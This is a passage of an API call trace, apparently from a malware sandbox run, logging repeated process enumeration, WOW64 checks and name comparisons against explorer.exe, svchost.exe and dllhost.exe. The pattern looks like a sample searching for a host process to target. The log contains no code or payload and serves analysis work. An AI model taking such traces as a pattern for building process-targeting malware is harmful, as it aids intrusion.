lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0236.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0236.734] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.734] CloseHandle (hObject=0xd8) returned 1 [0236.735] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0236.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0236.735] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.735] CloseHandle (hObject=0xd8) returned 1 [0236.735] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0236.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0236.736] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.736] CloseHandle (hObject=0xd8) returned 1 [0236.736] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0236.736] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0236.737] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0236.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0236.737] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0236.738] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0236.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0236.738] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0236.739] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.739] CloseHandle (hObject=0xd8) returned 1 [0236.739] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0236.739] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0236.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0236.739] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.739] CloseHandle (hObject=0xd8) returned 1 [0236.739] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0236.740] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0236.740] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0236.740] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0236.740] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0236.741] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.741] CloseHandle (hObject=0xd8) returned 1 [0236.741] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0236.741] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.741] CloseHandle (hObject=0xd8) returned 1 [0236.741] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0236.741] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0236.742] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.742] CloseHandle (hObject=0xd8) returned 1 [0236.742] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.742] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0236.743] CloseHandle (hObject=0xd4) returned 1 [0236.743] Sleep (dwMilliseconds=0x3e8) [0237.761] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0237.762] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0237.763] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0237.764] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0237.764] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0237.765] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0237.765] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0237.765] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0237.766] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0237.766] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0237.767] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0237.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0237.767] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0237.768] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0237.769] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0237.769] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0237.770] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0237.770] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0237.771] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0237.771] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0237.772] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0237.772] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.772] CloseHandle (hObject=0xd8) returned 1 [0237.772] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0237.772] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0237.772] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0237.772] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0237.773] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0237.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0237.773] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.773] CloseHandle (hObject=0xd8) returned 1 [0237.773] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0237.773] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0237.774] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0237.774] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0237.774] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0237.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0237.775] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0237.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0237.775] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.775] CloseHandle (hObject=0xd8) returned 1 [0237.775] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0237.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0237.776] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.776] CloseHandle (hObject=0xd8) returned 1 [0237.776] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0237.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0237.776] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.776] CloseHandle (hObject=0xd8) returned 1 [0237.776] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0237.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0237.777] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.777] CloseHandle (hObject=0xd8) returned 1 [0237.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0237.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0237.777] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.777] CloseHandle (hObject=0xd8) returned 1 [0237.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0237.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0237.778] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.778] CloseHandle (hObject=0xd8) returned 1 [0237.778] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0237.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0237.778] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.779] CloseHandle (hObject=0xd8) returned 1 [0237.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0237.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0237.779] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.779] CloseHandle (hObject=0xd8) returned 1 [0237.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0237.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0237.780] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.780] CloseHandle (hObject=0xd8) returned 1 [0237.780] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0237.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0237.780] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.780] CloseHandle (hObject=0xd8) returned 1 [0237.780] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0237.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0237.781] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.781] CloseHandle (hObject=0xd8) returned 1 [0237.781] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0237.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0237.781] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.781] CloseHandle (hObject=0xd8) returned 1 [0237.781] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0237.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0237.782] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.782] CloseHandle (hObject=0xd8) returned 1 [0237.782] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0237.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0237.783] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.783] CloseHandle (hObject=0xd8) returned 1 [0237.783] Process32Next (in: hSnapshot=0xd4, 